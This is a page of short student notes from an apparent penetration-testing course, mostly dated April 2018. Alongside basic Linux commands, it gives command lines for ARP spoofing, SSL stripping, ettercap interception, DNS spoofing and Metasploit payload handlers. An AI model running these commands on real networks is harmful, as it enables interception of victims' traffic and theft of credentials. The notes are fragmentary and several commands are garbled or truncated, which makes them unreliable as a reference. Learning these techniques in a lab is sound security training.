Advanced Penetration Testing Notes

starting

root@kali [view]

By: Rahul Bhukkal | Related Lesson: Linux (part 2) Kali Linux Commands | Modified: April 5, 2018

eploit direct expoitation

cadaver http://192…/webdav enter to servers and usernames passwords if you want out put something type: put test.txt you can do this with metasploit service postgreql start >> i think it’s correct msfconsole search xampp   [view]

By: Musaid | Related Lesson: Exploitation (part 1) Direct Exploitation | Modified: April 4, 2018

Traffoc capture ssl stripping

first do arpspoof this removes the s in https and give it to the target as http without making something wrong iptables -t nat -A PREROUTING -p tcp –destination-port REDIRECT –to-port 8080 sslstrip -l 8080 [view]

By: Musaid | Related Lesson: Traffic Capture (part 6) SSL Stripping | Modified: April 4, 2018

Traffic capture ettercap

start artpoofing before you have to put 1 always in the file below ettercap -Ti eth0 -H arp:remote /192.168.1.1 /victimIP echo 1 > /proc/sys/net/ipv4/ip_forward ettercap for secure website to break the certifcate [view]

By: Musaid | Related Lesson: Traffic Capture (part 5) ettercap | Modified: April 3, 2018

Part 7

(Part 7:  Network based Exploits and Debuggers) (On Windows XP VM):  On XAMPP Coontrol Panel, Stop FileZilla Go to the WarFTP folder, click on war-ftp daemon icon, click OK, click on the lightning bolt button Double click the Immunity Debugger on D [view]

By: GrapeApe561 | Related Lesson: Exploit Development (part 7) Network Based Exploits and Debuggers | Modified: April 3, 2018

1

read – write – execute first set – owner, second set – group, third group – everyone else chmod – alter permissions of a file? look @ manual | piping  grep – looks for text w/ regular expression in given fil [view]

By: testing223 | Related Lesson: Linux (part 4) chmod, manipulation and packages | Modified: April 3, 2018

1

can type full paths everything in linux is a file touch – creates a file, what type?  mkdir – making directory cp – moves a file (have to type accurate path from current directory) mv – renames file  rm – removes a fil [view]

By: testing223 | Related Lesson: Linux (part 3) - Directories, myfile and Nano | Modified: April 3, 2018

Traffic capture part 4

 arpsoof -i eth0 -t 192.168.1.1 192.168.100.7 arpsoof -i eth0 -t 192.168.100.7 192.168.1.1 one for the target gatewat and one for the target IP THIS IS FOR DNS SPOOFING OR POISNING CACHE nano hosts.txt and put in that text 127.0.0.1 gmail.com servic [view]

By: Musaid | Related Lesson: Traffic Capture (part 4) DNS | Modified: April 3, 2018

rgrt

-help format  msfvenom –help-formats multihandler — pick up the start handler  use mutli/handler     [view]

By: muru260484 | Related Lesson: Metasploit (part 6) msfvenom | Modified: April 3, 2018

Traffic Capture part3

before writing this write the after it because we want to forward the data to a correct place arpspoof -i eth0 -t 192.168.100.2 192.168.100.4 arpspoof -i eth0 -t 192.168.100.4 192.168.100.2 write first below cat /proc/sys/net/ipv4/ip_forward echo 1 & [view]

By: Musaid | Related Lesson: Traffic Capture (part 3) Address Resolution Protocol ARP | Modified: April 3, 2018

« First ‹ Previous 1 3 4 5 6 7 15 105 243 Next › Last »

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel